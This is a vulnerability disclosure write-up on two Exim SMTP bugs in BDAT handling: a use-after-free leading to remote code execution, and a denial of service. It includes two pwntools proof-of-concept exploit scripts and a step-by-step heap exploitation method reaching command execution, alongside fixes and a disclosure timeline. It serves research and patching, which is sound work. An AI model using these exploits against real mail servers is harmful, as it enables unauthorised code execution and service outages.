Road to Exim RCE - Abusing Unsafe Memory Allocator in the Most Popular MTA

On 23 November, 2017, we reported two vulnerabilities to Exim. These bugs exist in the SMTP daemon and attackers do not need to be authenticated, including CVE-2017-16943 for a use-after-free (UAF) vulnerability, which leads to Remote Code Execution (RCE); and CVE-2017-16944 for a Denial-of-Service (DoS) vulnerability.

About Exim

Exim is a message transfer agent (MTA) used on Unix systems. Exim is an open source project and is the default MTA on Debian GNU/Linux systems. According to our survey, there are about 600k SMTP servers running exim on 21st November, 2017 (data collected from scans.io). Also, a mail server survey by E-Soft Inc. shows over half of the mail servers identified are running exim.

Affected

Exim version 4.88 & 4.89 with chunking option enabled.
According to our survey, about 150k servers affected on 21st November, 2017 (data collected from scans.io).

Vulnerability Details

Through our research, the following vulnerabilies were discovered in Exim. Both vulnerabilies involve in BDAT command. BDAT is an extension in SMTP protocol, which is used to transfer large and binary data. A BDAT command is like BDAT 1024 or BDAT 1024 LAST. With the SIZE and LAST declared, mail servers do not need to scan for the end dot anymore. This command was introduced to exim in version 4.88, and also brought some bugs.

Use-after-free in receive_msg leads to RCE (CVE-2017-16943)
Incorrect BDAT data handling leads to DoS (CVE-2017-16944)

Vulnerability Analysis

To explain this bug, we need to start with the memory management of exim. There is a series of functions starts with store_ such as store_get, store_release, store_reset. These functions are used to manage dynamically allocated memory and improve performance. Its architecture is like the illustration below:
architecture of storeblock

Initially, exim allocates a big storeblock (default 0x2000) and then cut it into stores when store_get is called, using global pointers to record the size of unused memory and where to cut in next allocation. Once the current_block is insufficient, it allocates a new block and appends it to the end of the chain, which is a linked list, and then makes current_block point to it. Exim maintains three store_pool, that is, there are three chains like the illustration above and every global variables are actually arrays.
This vulnerability is in receive_msg where exim reads headers:
receive.c: 1817 receive_msg

  if (ptr >= header_size - 4)
    {
    int oldsize = header_size;
    /* header_size += 256; */
    header_size *= 2;
    if (!store_extend(next->text, oldsize, header_size))
      {
      uschar *newtext = store_get(header_size);
      memcpy(newtext, next->text, ptr);
      store_release(next->text);
      next->text = newtext;
      }
    }

It seems normal if the store functions are just like realloc, malloc and free. However, they are different and cannot be used in this way. When exim tries to extend store, the function store_extend checks whether the old store is the latest store allocated in current_block. It returns False immediately if the check is failed.
store.c: 276 store_extend

if (CS ptr + rounded_oldsize != CS (next_yield[store_pool]) ||
    inc > yield_length[store_pool] + rounded_oldsize - oldsize)
  return FALSE;

Once store_extend fails, exim tries to get a new store and release the old one. After we look into store_get and store_release, we found that store_get returns a store, but store_release releases a block if the store is at the head of it. That is to say, if next->text points to the start the current_block and store_get cuts store inside it for newtext, then store_release(next->text) frees next->text, which is equal to current_block, and leaves newtext and current_block pointing to a freed memory area. Any further usage of these pointers leads to a use-after-free vulnerability. To trigger this bug, we need to make exim call store_get after next->text is allocated. This was impossible until BDAT command was introduced into exim. BDAT makes store_get reachable and finally leads to an RCE.
Exim uses function pointers to switch between different input sources, such as receive_getc, receive_getbuf. When receiving BDAT data, receive_getc is set to bdat_getc in order to check left chunking data size and to handle following command of BDAT. In receive_msg, exim also uses receive_getc. It loops to read data, and stores data into next->text, extends if insufficient.
receive.c: 1817 receive_msg

for (;;)
  {
  int ch = (receive_getc)(GETC_BUFFER_UNLIMITED);
  
  /* If we hit EOF on a SMTP connection, it's an error, since incoming
  SMTP must have a correct "." terminator. */

  if (ch == EOF && smtp_input /* && !smtp_batched_input */)
    {
    smtp_reply = handle_lost_connection(US" (header)");
    smtp_yield = FALSE;
    goto TIDYUP;                       /* Skip to end of function */
    }

In bdat_getc, once the SIZE is reached, it tries to read the next BDAT command and raises error message if the following command is incorrect.
smtp_in.c: 628 bdat_getc

    case BDAT_CMD:
      {
      int n;

      if (sscanf(CS smtp_cmd_data, "%u %n", &chunking_datasize, &n) < 1)
  {
  (void) synprot_error(L_smtp_protocol_error, 501, NULL,
    US"missing size for BDAT command");
  return ERR;
  }

In exim, it usually calls synprot_error to raise error message, which also logs at the same time.
smtp_in.c: 628 bdat_getc

static int
synprot_error(int type, int code, uschar *data, uschar *errmess)
{
int yield = -1;

log_write(type, LOG_MAIN, "SMTP %s error in \"%s\" %s %s",
  (type == L_smtp_syntax_error)? "syntax" : "protocol",
  string_printing(smtp_cmd_buffer), host_and_ident(TRUE), errmess);

The log messages are printed by string_printing. This function ensures a string is printable. For this reason, it extends the string to transfer characters if any unprintable character exists, such as '\n'->'\\n'. Therefore, it asks store_get for memory to store strings.
This store makes if (!store_extend(next->text, oldsize, header_size)) in receive_msg failed when next extension occurs and then triggers use-after-free.

Exploitation

The following is the Proof-of-Concept(PoC) python script of this vulnerability. This PoC controls the control flow of SMTP server and sets instruction pointer to 0xdeadbeef. For fuzzing issue, we did change the runtime configuration of exim. As a result, this PoC works only when dkim is enabled. We use it as an example because the situation is less complicated. The version with default configuration is also exploitable, and we will discuss it at the end of this section.

# CVE-2017-16943 PoC by meh at DEVCORE
# pip install pwntools
from pwn import *

r = remote('127.0.0.1', 25)

r.recvline()
r.sendline("EHLO test")
r.recvuntil("250 HELP")
r.sendline("MAIL FROM:<[email protected]>")
r.recvline()
r.sendline("RCPT TO:<[email protected]>")
r.recvline()
r.sendline('a'*0x1250+'\x7f')
r.recvuntil('command')
r.sendline('BDAT 1')
r.sendline(':BDAT \x7f')
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ':\r\n')
r.recvuntil('command')
r.send('\n')

r.interactive()

Running out of current_block
In order to achieve code execution, we need to make the next->text get the first store of a block. That is, running out of current_block and making store_get allocate a new block. Therefore, we send a long message 'a'*0x1250+'\x7f' with an unprintable character to cut current_block, making yield_length less than 0x100.
Starts BDAT data transfer
After that, we send BDAT command to start data transfer. At the beginning, next and next->text are allocated by store_get.

The function dkim_exim_verify_init is called sequentially and it also calls store_get. Notice that this function uses ANOTHER store_pool, so it allocates from heap without changing current_block which next->text also points to.
receive.c: 1734 receive_msg
```
 if (smtp_input && !smtp_batched_input && !dkim_disable_verify)
   dkim_exim_verify_init(chunking_state <= CHUNKING_OFFERED);
```
Call store_getc inside bdat_getc
Then, we send a BDAT command without SIZE. Exim complains about the incorrect command and cuts the current_block with store_get in string_printing.
Keep sending msg until extension and bug triggered
In this way, while we keep sending huge messages, current_block gets freed after the extension. In the malloc.c of glibc (so called ptmalloc2), system manages a linked list of freed memory chunks, which is called unsorted bin. Freed chunks are put into unsorted bin if it is not the last chunk on the heap. In step 2, dkim_exim_verify_init allocated chunks after next->text. Therefore, this chunk is put into unsorted bin and the pointers of linked list are stored into the first 16 bytes of chunk (on x86-64). The location written is exactly current_block->next, and therefore current_block->next is overwritten to unsorted bin inside main_arena of libc (linked list pointer fd points back to unsorted bin if no other freed chunk exists).
Keep sending msg for the next extension
When the next extension occurs, store_get tries to cut from main_arena, which makes attackers able to overwrite all global variables below main_arena.
Overwrite global variables in libc
Finish sending message and trigger free()
In the PoC, we simply modified __free_hook and ended the line. Exim calls store_reset to reset the buffer and calls __free_hook in free(). At this stage, we successfully controlled instruction pointer $rip.
However, this is not enough for an RCE because the arguments are uncontrollable. As a result, we improved this PoC to modify both __free_hook and _IO_2_1_stdout_. We forged the vtable of stdout and set __free_hook to any call of fflush(stdout) inside exim. When the program calls fflush, it sets the first argument to stdout and jumps to a function pointer on the vtable of stdout. Hence, we can control both $rip and the content of first argument.
We consulted past CVE exploits and decided to call expand_string, which executes command with execv if we set the first argument to ${run{cmd}}, and finally we got our RCE.

Exploit for default configured exim

When dkim is disabled, the PoC above fails because current_block is the last chunk on heap. This makes the system merge it into a big chunk called top chunk rather than unsorted bin.
The illustrations below describe the difference of heap layout:

To avoid this, we need to make exim allocate and free some memories before we actually start our exploitation. Therefore, we add some steps between step 1 and step 2.

After running out of current_block:

Use DATA command to send lots of data
Send huge data, make the chunk big and extend many times. After several extension, it calls store_get to retrieve a bigger store and then releases the old one. This repeats many times if the data is long enough. Therefore, we have a big chunk in unsorted bin.
End DATA transfer and start a new email
Restart to send an email with BDAT command after the heap chunk is prepared.
Adjust yield_length again
Send invalid command with an unprintable charater again to cut the current_block.

Finally the heap layout is like:

And now we can go back to the step 2 at the beginning and create the same situation. When next->text is freed, it goes back to unsorted bin and we are able to overwrite libc global variables again.
The following is the PoC for default configured exim:

# CVE-2017-16943 PoC by meh at DEVCORE
# pip install pwntools
from pwn import *

r = remote('localhost', 25)

r.recvline()
r.sendline("EHLO test")
r.recvuntil("250 HELP")
r.sendline("MAIL FROM:<>")
r.recvline()
r.sendline("RCPT TO:<[email protected]>")
r.recvline()
r.sendline('a'*0x1280+'\x7f')
r.recvuntil('command')
r.sendline('DATA')
r.recvuntil('itself\r\n')
r.sendline('b'*0x4000+':\r\n')
r.sendline('.\r\n')
r.sendline('.\r\n')
r.recvline()
r.sendline("MAIL FROM:<>")
r.recvline()
r.sendline("RCPT TO:<[email protected]>")
r.recvline()
r.sendline('a'*0x3480+'\x7f')
r.recvuntil('command')
r.sendline('BDAT 1')
r.sendline(':BDAT \x7f')
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ':\r\n')
r.send('\n')
r.interactive()

A demo of our exploit is as below.

Note that we have not found a way to leak memory address and therefore we use heap spray instead. It requires another information leakage vulnerability to overcome the PIE mitigation on x86-64.

Vulnerability Analysis

When receiving data with BDAT command, SMTP server should not consider a single dot ‘.’ in a line to be the end of message. However, we found exim does in receive_msg when parsing header. Like the following output:

220 devco.re ESMTP Exim 4.90devstart_213-7c6ec81-XX Mon, 27 Nov 2017 16:58:20 +0800
EHLO test
250-devco.re Hello root at test
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN CRAM-MD5
250-CHUNKING
250-STARTTLS
250-PRDR
250 HELP
MAIL FROM:<[email protected]>
250 OK
RCPT TO:<[email protected]>
250 Accepted
BDAT 10
.
250- 10 byte chunk, total 0
250 OK id=1eJFGW-000CB0-1R

As we mentioned before, exim uses function pointers to switch input source. This bug makes exim go into an incorrect state because the function pointer receive_getc is not reset. If the next command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. Program crashes due to stack exhaustion.
smtp_in.c: 546 bdat_getc

  if (chunking_data_left > 0)
    return lwr_receive_getc(chunking_data_left--);

This is not enough to pose a threat because exim runs a fork server. After a further analysis, we made exim go into an infinite loop without crashing, using the following commands.

This makes attackers able to launch a resource based DoS attack and then force the whole server down.

Fix

Turn off Chunking option in config file:
```
chunking_advertise_hosts =
```
Update to 4.89.1 version
Patch of CVE-2017-16943 released here
Patch of CVE-2017-16944 released here

Timeline

23 November, 2017 09:40 Report to Exim Bugzilla
25 November, 2017 16:27 CVE-2017-16943 Patch released
28 November, 2017 16:27 CVE-2017-16944 Patch released
3 December, 2017 13:15 Send an advisory release notification to Exim and wait for reply until now

While we were trying to report these bugs to exim, we could not find any method for security report. Therefore, we followed the link on the official site for bug report and found the security option. Unexpectedly, the Bugzilla posts all bugs publicly and therefore the PoC was leaked. Exim team responded rapidly and improved their security report process by adding a notification for security reports in reaction to this.

Credits

Vulnerabilities found by Meh, DEVCORE research team.
meh [at] devco [dot] re

Reference

https://bugs.exim.org/show_bug.cgi?id=2199
https://bugs.exim.org/show_bug.cgi?id=2201
https://nvd.nist.gov/vuln/detail/CVE-2017-16943
https://nvd.nist.gov/vuln/detail/CVE-2017-16944
https://lists.exim.org/lurker/message/20171125.034842.d1d75cac.en.html